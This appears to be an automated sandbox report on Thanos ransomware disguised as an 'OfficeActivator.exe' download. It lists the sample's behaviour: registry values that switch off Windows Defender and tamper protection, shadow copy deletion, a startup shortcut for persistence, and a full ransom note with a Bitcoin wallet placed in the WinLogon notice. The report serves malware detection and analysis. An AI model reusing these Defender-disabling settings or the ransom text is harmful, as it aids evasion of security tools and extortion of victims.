Analysis Overview
Threat Level: Known bad
The file https://mega.nz/file/9oYFjCZA#ChQlTD2yXk-a0E8r1dywSIfxnRiaxkvwtfccnwYyc0A was found to be: Known bad.
Malicious Activity Summary
Disables service(s)
Thanos family
Thanos Ransomware
Thanos executable
Modifies Windows Defender Real-time Protection settings
Contains code to disable Windows Defender
Deletes shadow copies
Renames multiple (52) files with added filename extension
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Executes dropped EXE
Drops startup file
Windows security modification
Network Service Discovery
Legitimate hosting services abused for malware hosting/C2
Modifies WinLogon
Launches sc.exe
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Kills process with taskkill
NTFS ADS
Suspicious use of FindShellTrayWindow
Interacts with shadow copies
Runs net.exe
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 17:27
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 17:27
Reported
2024-11-08 17:28
Platform
win10v2004-20241007-en
Max time kernel
78s
Max time network
85s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
Thanos Ransomware
Thanos executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Thanos family
Deletes shadow copies
Renames multiple (52) files with added filename extension
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
Executes dropped EXE
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" | C:\Users\Admin\Desktop\OfficeActivator.exe | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\arp.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ztqbqpbr.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Interacts with shadow copies
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e8005398e082303024b98265d99428e115f0000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 149254.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/9oYFjCZA#ChQlTD2yXk-a0E8r1dywSIfxnRiaxkvwtfccnwYyc0A
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc36c046f8,0x7ffc36c04708,0x7ffc36c04718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,14556057001732556787,887587439821873330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
